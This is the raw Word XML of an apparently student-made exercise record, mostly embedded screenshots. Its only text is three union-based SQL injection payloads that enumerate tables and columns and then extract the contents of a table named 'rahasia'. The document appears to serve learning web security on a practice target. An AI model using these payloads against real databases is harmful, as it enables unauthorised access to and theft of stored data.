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49F07" w14:textId="6675059C" w:rsidR="00F509C8" w:rsidRDefault="00A1357E">
      <w:r w:rsidRPr="00A1357E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32652A15" wp14:editId="6E0C3D7F">
            <wp:extent cx="3191320" cy="2705478"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="168404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48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9FF7" w14:textId="77777777" w:rsidR="00A1357E" w:rsidRDefault="00A1357E"/>
    <w:p w14:paraId="20A6DD01" w14:textId="0723F183" w:rsidR="00A1357E" w:rsidRDefault="00A1357E">
      <w:r w:rsidRPr="00A1357E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08F4EC2F" wp14:editId="6A3140C1">
            <wp:extent cx="5731510" cy="4841875"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="930896898" name="Picture 1" descr="A screenshot of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96898" name="Picture 1" descr="A screenshot of a book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77D3" w14:textId="77777777" w:rsidR="00A1357E" w:rsidRDefault="00A1357E"/>
    <w:p w14:paraId="08DBD662" w14:textId="1C2EAD19" w:rsidR="00A1357E" w:rsidRDefault="00A1357E">
      <w:r w:rsidRPr="00A1357E">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45B36256" wp14:editId="05A8C82B">
            <wp:extent cx="5731510" cy="2065020"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="16950972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972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5D3E7" w14:textId="77777777" w:rsidR="00A1357E" w:rsidRDefault="00A1357E"/>
    <w:p w14:paraId="46C7B75B" w14:textId="6C6FDC7F" w:rsidR="00A1357E" w:rsidRDefault="00A1357E">
      <w:r w:rsidRPr="00A1357E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A6AD519" wp14:editId="7FFE1A24">
            <wp:extent cx="5731510" cy="2815590"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="10038105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1050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DF5E" w14:textId="77777777" w:rsidR="00A1357E" w:rsidRDefault="00A1357E"/>
    <w:p w14:paraId="58721ECD" w14:textId="05A13536" w:rsidR="00A1357E" w:rsidRDefault="00A1357E">
      <w:r w:rsidRPr="00A1357E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1483049A" wp14:editId="1A0C752B">
            <wp:extent cx="5731510" cy="2054225"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="9237544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544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72E" w14:textId="77777777" w:rsidR="00A1357E" w:rsidRDefault="00A1357E"/>
    <w:p w14:paraId="6A99E022" w14:textId="3EE0CD5D" w:rsidR="00A1357E" w:rsidRDefault="00A1357E">
      <w:r w:rsidRPr="00A1357E">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51334E03" wp14:editId="7168A158">
            <wp:extent cx="5731510" cy="2571115"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="495355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5515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71C52" w14:textId="77777777" w:rsidR="00A1357E" w:rsidRDefault="00A1357E"/>
    <w:p w14:paraId="5F0C1F33" w14:textId="29D0E080" w:rsidR="00A1357E" w:rsidRDefault="00A1357E">
      <w:r w:rsidRPr="00A1357E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D415EF9" wp14:editId="13BFA61E">
            <wp:extent cx="5731510" cy="4512310"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="196875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56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A94A4" w14:textId="070AF621" w:rsidR="001E2BA0" w:rsidRDefault="001E2BA0">
      <w:r w:rsidRPr="001E2BA0">
        <w:t xml:space="preserve">' union </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E2BA0">
        <w:t>select</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E2BA0">
        <w:t xml:space="preserve"> 1,table_name,"a","a","a" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E2BA0">
        <w:t>from</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E2BA0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E2BA0">
        <w:t>information_schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E2BA0">
        <w:t xml:space="preserve"> #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390DB497" w14:textId="77777777" w:rsidR="001E2BA0" w:rsidRDefault="001E2BA0"/>
    <w:p w14:paraId="7242D385" w14:textId="77777777" w:rsidR="001E2BA0" w:rsidRDefault="001E2BA0"/>
    <w:p w14:paraId="52CC5F83" w14:textId="6DEAD5EF" w:rsidR="001E2BA0" w:rsidRDefault="001E2BA0">
      <w:r w:rsidRPr="001E2BA0">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="651E2763" wp14:editId="05355876">
            <wp:extent cx="5731510" cy="3456940"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1891053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5372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D460D" w14:textId="7FF86FD8" w:rsidR="001E2BA0" w:rsidRDefault="001E2BA0">
      <w:r w:rsidRPr="001E2BA0">
        <w:t xml:space="preserve">' union </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E2BA0">
        <w:t>select</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E2BA0">
        <w:t xml:space="preserve"> 1,column_name,"a","a","a" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E2BA0">
        <w:t>from</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E2BA0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E2BA0">
        <w:t>information_schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E2BA0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E2BA0">
        <w:t>where</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E2BA0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E2BA0">
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E2BA0">
        <w:t>="rahasia" #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685EF5CF" w14:textId="77777777" w:rsidR="001E2BA0" w:rsidRDefault="001E2BA0"/>
    <w:p w14:paraId="5A16BCCC" w14:textId="724FD56E" w:rsidR="001E2BA0" w:rsidRDefault="001E2BA0">
      <w:r w:rsidRPr="001E2BA0">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BBBC99B" wp14:editId="6241866B">
            <wp:extent cx="5731510" cy="2456180"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="1820898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8987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5F83" w14:textId="621F840A" w:rsidR="001E2BA0" w:rsidRDefault="001E2BA0">
      <w:r w:rsidRPr="001E2BA0">
        <w:t xml:space="preserve">' union </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E2BA0">
        <w:t>select</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E2BA0">
        <w:t xml:space="preserve"> 1,isi,"a","a","a" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E2BA0">
        <w:t>from</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E2BA0">
        <w:t xml:space="preserve"> rahasia #</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="001E2BA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7E"/>
    <w:rsid w:val="000A5727"/>
    <w:rsid w:val="001E2BA0"/>
    <w:rsid w:val="003704CF"/>
    <w:rsid w:val="00A1357E"/>
    <w:rsid w:val="00DE2B04"/>
    <w:rsid w:val="00F5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2409D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{129C3E17-D5A6-47D5-9610-A2FE14E65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ARKHA RAMA HARISHA</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>ARKHA RAMA HARISHA</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-09-25T04:11:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-25T04:24:00Z</dcterms:modified>
</cp:coreProperties>
</file>